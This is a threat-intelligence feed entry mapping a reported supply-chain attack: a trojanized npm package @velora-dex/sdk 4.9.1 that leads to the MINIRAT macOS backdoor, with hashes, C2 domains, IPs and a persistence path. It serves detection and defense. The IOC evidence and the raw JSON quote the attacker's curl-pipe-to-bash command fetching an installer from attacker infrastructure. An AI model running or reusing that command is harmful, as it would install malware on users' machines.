← feed

wiz.2026.jinx-0164-velora-sdk-minirat-supply-chain

JINX-0164 trojanized @velora-dex/sdk to MINIRAT macOS C2 chain

IIM chain for the Wiz Research report published on 2026-05-27 describing JINX-0164 supply-chain activity. The chain models trojanized npm package @velora-dex/sdk version 4.9.1, a malicious dist/index.js addition that decodes and runs a curl command to 89.36.224.5/troubleshoot/mac/install.sh, dropper delivery, MINIRAT macOS payload execution, and the shared datahub.ink / cloud-sync.online / byte-io.us C2 domain set. It intentionally does not invent npm account credentials, unpublished package download telemetry beyond Wiz/StepSecurity references, or a source-repository compromise because Wiz explicitly says the GitHub source code was not modified.

confirmed IIM v1.1 JINX-0164
Raw JSON
entities15
relations17
techniques3
published2026-05-28 13:43:20

Infrastructure map

Role-based chain map

click nodes or numbered relations to inspect the infrastructure path
entryredirectorstagingpayloadc2

Chain storyline

ordered IIM positions
1
entry

url

https://www.npmjs.com/package/@velora-dex/sdk/v/4.9.1

IIM-T006
2
entry

file

@velora-dex/sdk dist/index.js malicious appended exec block

3
staging

url

http://89.36.224.5/troubleshoot/mac/install.sh

IIM-T002
4
staging

ip

89.36.224.5

IIM-T002
5
staging

hash

c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e

6
staging

hash

2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460

7
payload

hash

0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270

8
payload

hash

0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d

9
payload

hash

a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b

10
staging

file

~/Library/LaunchAgents/com.apple.Terminal.profiler.plist

11
c2

domain

datahub.ink

IIM-T011
12
c2

domain

cloud-sync.online

IIM-T011
13
c2

domain

byte-io.us

IIM-T011
14
c2

ip

208.115.220.17

15
c2

ip

185.175.59.85

Relations

directed infrastructure edges
e001dropse002 confirmed
e002downloade003 confirmed
e003resolves-toe004 confirmed
e003referencese005 confirmed
e003referencese006 confirmed
e005dropse007 likely
e005dropse008 likely
e006dropse007 likely
e006dropse008 likely
e007dropse010 confirmed
e008dropse010 confirmed
e007connecte011 confirmed
e007connecte012 confirmed
e007connecte013 confirmed
e011resolves-toe014 confirmed
e011resolves-toe015 confirmed
e009connecte011 confirmed

Entities & evidence

observable inventory
IDTypeValueSource / evidence
e001 url https://www.npmjs.com/package/@velora-dex/sdk/v/4.9.1
Wiz states JINX-0164 trojanized version 4.9.1 of the npm package @velora-dex/sdk on April 7, 2026.
Wiz states Velora is a DEX aggregation protocol and the SDK was an attractive cryptocurrency-industry target.
Wiz states the GitHub source code was not modified, suggesting access was limited to npm credentials.
e002 file @velora-dex/sdk dist/index.js malicious appended exec block
Wiz states the malicious package appended three lines to dist/index.js.
Wiz publishes the JavaScript exec block that base64-decodes and runs a shell command.
The decoded command downloads install.sh from http://89.36.224.5/troubleshoot/mac/install.sh.
e003 url http://89.36.224.5/troubleshoot/mac/install.sh
Wiz publishes the decoded command: nohup bash -c "$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)".
Wiz lists two dropper hashes delivered via supply chain from 89.36.224.5.
Wiz states the shell script structure is similar to scripts used to deliver AUDIOFIX but does not display terminal output.
e004 ip 89.36.224.5
Wiz publishes 89.36.224.5 in the decoded @velora-dex/sdk command.
Wiz lists 89.36.224.5 in payload delivery domains for driver-store.com and in supply-chain dropper rows.
Modeled as staging infrastructure for the supply-chain installer URL.
e005 hash c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e
Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).
This hash is modeled as one of the install.sh/dropper artifacts associated with the supply-chain operation.
e006 hash 2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460
Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).
This hash is modeled as another dropper artifact associated with the supply-chain operation.
e007 hash 0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270
Wiz lists this SHA-256 as MINIRAT ARM64.
Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.
Wiz states MINIRAT performs basic reconnaissance, sets persistence, and supports shell command execution, file upload/download, and compression/upload functionality.
e008 hash 0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d
Wiz lists this SHA-256 as MINIRAT x86_64.
Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.
Wiz states MINIRAT uses the same AES key and the same three C&C domains as AUDIOFIX.
e009 hash a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b
Wiz lists this SHA-256 as MINIRAT ARM64.
Wiz states a slightly modified MINIRAT version was uploaded to VirusTotal on May 8, 2026, indicating continued use in additional operations.
e010 file ~/Library/LaunchAgents/com.apple.Terminal.profiler.plist
Wiz states MINIRAT sets persistence by writing a plist under ~/Library/LaunchAgents/ with the label com.apple.Terminal.profiler.
The plist is modeled as host persistence created by the payload.
e011 domain datahub.ink
Wiz states MINIRAT uses the same three C&C domains as AUDIOFIX.
Wiz lists datahub.ink as the primary C&C domain and provides two resolved IPs.
Wiz states at publication only the primary domain had been identified resolving.
e012 domain cloud-sync.online
Wiz lists cloud-sync.online as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.
The IOC table lists no resolved IP for this domain at publication.
e013 domain byte-io.us
Wiz lists byte-io.us as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.
The IOC table lists no resolved IP for this domain at publication.
e014 ip 208.115.220.17
Wiz lists datahub.ink resolving to 208.115.220.17.
This IP is modeled only as a resolved target for the primary C2 domain.
e015 ip 185.175.59.85
Wiz lists datahub.ink resolving to 185.175.59.85.
This IP is modeled only as a resolved target for the primary C2 domain.

ATT&CK annotations

optional complementary mapping
T1195.002Supply Chain Compromise: Compromise Software Supply Chain

Trojanized @velora-dex/sdk package version 4.9.1 on npm.

T1059.004Command and Scripting Interpreter: Unix Shell

Decoded npm payload runs curl-fetched shell script.

T1543.001Create or Modify System Process: Launch Agent

MINIRAT LaunchAgent persistence under ~/Library/LaunchAgents.

Raw IIM JSON canonical body from MANTIS expand
{
  "iim_version": "1.1",
  "chain_id": "wiz.2026.jinx-0164-velora-sdk-minirat-supply-chain",
  "title": "JINX-0164 trojanized @velora-dex/sdk to MINIRAT macOS C2 chain",
  "description": "IIM chain for the Wiz Research report published on 2026-05-27 describing JINX-0164 supply-chain activity. The chain models trojanized npm package @velora-dex/sdk version 4.9.1, a malicious dist/index.js addition that decodes and runs a curl command to 89.36.224.5/troubleshoot/mac/install.sh, dropper delivery, MINIRAT macOS payload execution, and the shared datahub.ink / cloud-sync.online / byte-io.us C2 domain set. It intentionally does not invent npm account credentials, unpublished package download telemetry beyond Wiz/StepSecurity references, or a source-repository compromise because Wiz explicitly says the GitHub source code was not modified.",
  "actor_id": "JINX-0164",
  "observed_at": "2026-05-27T00:00:00Z",
  "confidence": "confirmed",
  "needs_review": false,
  "import_source": "manual-osint-report-to-iim-conversion",
  "entities": [
    {
      "id": "e001",
      "type": "url",
      "value": "https://www.npmjs.com/package/@velora-dex/sdk/v/4.9.1",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states JINX-0164 trojanized version 4.9.1 of the npm package @velora-dex/sdk on April 7, 2026.",
        "Wiz states Velora is a DEX aggregation protocol and the SDK was an attractive cryptocurrency-industry target.",
        "Wiz states the GitHub source code was not modified, suggesting access was limited to npm credentials."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_package_name": "@velora-dex/sdk",
      "x_package_version": "4.9.1",
      "x_ecosystem": "npm",
      "x_exact_ioc_published": true
    },
    {
      "id": "e002",
      "type": "file",
      "value": "@velora-dex/sdk dist/index.js malicious appended exec block",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states the malicious package appended three lines to dist/index.js.",
        "Wiz publishes the JavaScript exec block that base64-decodes and runs a shell command.",
        "The decoded command downloads install.sh from http://89.36.224.5/troubleshoot/mac/install.sh."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e003",
      "type": "url",
      "value": "http://89.36.224.5/troubleshoot/mac/install.sh",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz publishes the decoded command: nohup bash -c \"$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)\".",
        "Wiz lists two dropper hashes delivered via supply chain from 89.36.224.5.",
        "Wiz states the shell script structure is similar to scripts used to deliver AUDIOFIX but does not display terminal output."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_defanged_value": "http://89.36.224[.]5/troubleshoot/mac/install.sh",
      "x_exact_ioc_published": true
    },
    {
      "id": "e004",
      "type": "ip",
      "value": "89.36.224.5",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz publishes 89.36.224.5 in the decoded @velora-dex/sdk command.",
        "Wiz lists 89.36.224.5 in payload delivery domains for driver-store.com and in supply-chain dropper rows.",
        "Modeled as staging infrastructure for the supply-chain installer URL."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e005",
      "type": "hash",
      "value": "c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).",
        "This hash is modeled as one of the install.sh/dropper artifacts associated with the supply-chain operation."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "JINX-0164 supply-chain dropper",
      "x_exact_ioc_published": true
    },
    {
      "id": "e006",
      "type": "hash",
      "value": "2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as Dropper Delivered via supply chain (89.36.224.5).",
        "This hash is modeled as another dropper artifact associated with the supply-chain operation."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "JINX-0164 supply-chain dropper",
      "x_exact_ioc_published": true
    },
    {
      "id": "e007",
      "type": "hash",
      "value": "0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as MINIRAT ARM64.",
        "Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.",
        "Wiz states MINIRAT performs basic reconnaissance, sets persistence, and supports shell command execution, file upload/download, and compression/upload functionality."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "MINIRAT",
      "x_architecture": "arm64",
      "x_exact_ioc_published": true
    },
    {
      "id": "e008",
      "type": "hash",
      "value": "0b028b781950641818800fee2b4bf68e4ef2bcee53fe71a21755275ba108783d",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as MINIRAT x86_64.",
        "Wiz describes MINIRAT as a lightweight Go backdoor with versions for x86 and ARM.",
        "Wiz states MINIRAT uses the same AES key and the same three C&C domains as AUDIOFIX."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "MINIRAT",
      "x_architecture": "x86_64",
      "x_exact_ioc_published": true
    },
    {
      "id": "e009",
      "type": "hash",
      "value": "a35d2b67fa478a7174e308b43ce30bf69b3bc6f44fa76197fdf95fc2fbc1cf5b",
      "observed_at": "2026-05-08T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists this SHA-256 as MINIRAT ARM64.",
        "Wiz states a slightly modified MINIRAT version was uploaded to VirusTotal on May 8, 2026, indicating continued use in additional operations."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_malware_family": "MINIRAT",
      "x_architecture": "arm64",
      "x_exact_ioc_published": true
    },
    {
      "id": "e010",
      "type": "file",
      "value": "~/Library/LaunchAgents/com.apple.Terminal.profiler.plist",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states MINIRAT sets persistence by writing a plist under ~/Library/LaunchAgents/ with the label com.apple.Terminal.profiler.",
        "The plist is modeled as host persistence created by the payload."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e011",
      "type": "domain",
      "value": "datahub.ink",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz states MINIRAT uses the same three C&C domains as AUDIOFIX.",
        "Wiz lists datahub.ink as the primary C&C domain and provides two resolved IPs.",
        "Wiz states at publication only the primary domain had been identified resolving."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e012",
      "type": "domain",
      "value": "cloud-sync.online",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists cloud-sync.online as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.",
        "The IOC table lists no resolved IP for this domain at publication."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e013",
      "type": "domain",
      "value": "byte-io.us",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists byte-io.us as a hard-coded backup C2 domain used by MINIRAT and AUDIOFIX.",
        "The IOC table lists no resolved IP for this domain at publication."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e014",
      "type": "ip",
      "value": "208.115.220.17",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists datahub.ink resolving to 208.115.220.17.",
        "This IP is modeled only as a resolved target for the primary C2 domain."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    },
    {
      "id": "e015",
      "type": "ip",
      "value": "185.175.59.85",
      "observed_at": "2026-04-07T00:00:00Z",
      "source": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
      "evidence": [
        "Wiz lists datahub.ink resolving to 185.175.59.85.",
        "This IP is modeled only as a resolved target for the primary C2 domain."
      ],
      "x_reference_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
      "x_exact_ioc_published": true
    }
  ],
  "chain": [
    {
      "entity_id": "e001",
      "role": "entry",
      "techniques": [
        "IIM-T006"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e002",
      "role": "entry",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e003",
      "role": "staging",
      "techniques": [
        "IIM-T002"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e004",
      "role": "staging",
      "techniques": [
        "IIM-T002"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e005",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e006",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e007",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e008",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e009",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e010",
      "role": "staging",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e011",
      "role": "c2",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e012",
      "role": "c2",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e013",
      "role": "c2",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e014",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e015",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    }
  ],
  "relations": [
    {
      "from": "e001",
      "to": "e002",
      "type": "drops",
      "sequence_order": 1,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states version 4.9.1 appended three malicious lines to dist/index.js."
      ]
    },
    {
      "from": "e002",
      "to": "e003",
      "type": "download",
      "sequence_order": 2,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz publishes the decoded curl command to http://89.36.224.5/troubleshoot/mac/install.sh."
      ]
    },
    {
      "from": "e003",
      "to": "e004",
      "type": "resolves-to",
      "sequence_order": 3,
      "confidence": "confirmed",
      "x_evidence": [
        "The installer URL directly uses IP 89.36.224.5 as the host."
      ]
    },
    {
      "from": "e003",
      "to": "e005",
      "type": "references",
      "sequence_order": 4,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists c6ef... as Dropper Delivered via supply chain (89.36.224.5)."
      ]
    },
    {
      "from": "e003",
      "to": "e006",
      "type": "references",
      "sequence_order": 5,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists 2a10... as Dropper Delivered via supply chain (89.36.224.5)."
      ]
    },
    {
      "from": "e005",
      "to": "e007",
      "type": "drops",
      "sequence_order": 6,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states the shell script downloads MINIRAT; exact per-dropper hash-to-MINIRAT hash mapping is not published in a table."
      ]
    },
    {
      "from": "e005",
      "to": "e008",
      "type": "drops",
      "sequence_order": 7,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states MINIRAT supports ARM and x86; exact per-dropper hash-to-payload hash mapping is not published."
      ]
    },
    {
      "from": "e006",
      "to": "e007",
      "type": "drops",
      "sequence_order": 8,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states the supply-chain shell script downloads MINIRAT; exact per-dropper mapping is not published."
      ]
    },
    {
      "from": "e006",
      "to": "e008",
      "type": "drops",
      "sequence_order": 9,
      "confidence": "likely",
      "x_evidence": [
        "Wiz states MINIRAT supports ARM and x86; exact per-dropper mapping is not published."
      ]
    },
    {
      "from": "e007",
      "to": "e010",
      "type": "drops",
      "sequence_order": 10,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT writes a LaunchAgents plist with label com.apple.Terminal.profiler."
      ]
    },
    {
      "from": "e008",
      "to": "e010",
      "type": "drops",
      "sequence_order": 11,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT writes a LaunchAgents plist with label com.apple.Terminal.profiler."
      ]
    },
    {
      "from": "e007",
      "to": "e011",
      "type": "connect",
      "sequence_order": 12,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT uses datahub.ink, cloud-sync.online and byte-io.us as C2 domains."
      ]
    },
    {
      "from": "e007",
      "to": "e012",
      "type": "connect",
      "sequence_order": 13,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT uses the same three C2 domains as AUDIOFIX."
      ]
    },
    {
      "from": "e007",
      "to": "e013",
      "type": "connect",
      "sequence_order": 14,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states MINIRAT uses the same three C2 domains as AUDIOFIX."
      ]
    },
    {
      "from": "e011",
      "to": "e014",
      "type": "resolves-to",
      "sequence_order": 15,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists datahub.ink resolving to 208.115.220.17."
      ]
    },
    {
      "from": "e011",
      "to": "e015",
      "type": "resolves-to",
      "sequence_order": 16,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz lists datahub.ink resolving to 185.175.59.85."
      ]
    },
    {
      "from": "e009",
      "to": "e011",
      "type": "connect",
      "sequence_order": 17,
      "confidence": "confirmed",
      "x_evidence": [
        "Wiz states the slightly modified May 8 MINIRAT version uses the same C2 domains."
      ]
    }
  ],
  "attack_annotations": [
    {
      "technique_id": "T1195.002",
      "name": "Supply Chain Compromise: Compromise Software Supply Chain",
      "tactic": "Initial Access",
      "comment": "Trojanized @velora-dex/sdk package version 4.9.1 on npm."
    },
    {
      "technique_id": "T1059.004",
      "name": "Command and Scripting Interpreter: Unix Shell",
      "tactic": "Execution",
      "comment": "Decoded npm payload runs curl-fetched shell script."
    },
    {
      "technique_id": "T1543.001",
      "name": "Create or Modify System Process: Launch Agent",
      "tactic": "Persistence",
      "comment": "MINIRAT LaunchAgent persistence under ~/Library/LaunchAgents."
    }
  ],
  "x_publication_date": "2026-05-27",
  "x_source_url": "https://www.wiz.io/blog/threat-actors-target-crypto-orgs",
  "x_source_title": "Wiz: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure (2026-05-27)",
  "x_modeling_notes": [
    "Wiz explicitly states the GitHub source code was not modified; the entry is therefore the npm package, not the upstream repository.",
    "Exact npm account compromise details are not published and are not modeled as IoCs.",
    "MINIRAT hash-to-installer mapping is not fully published, so dropper-to-payload relations are marked likely."
  ]
}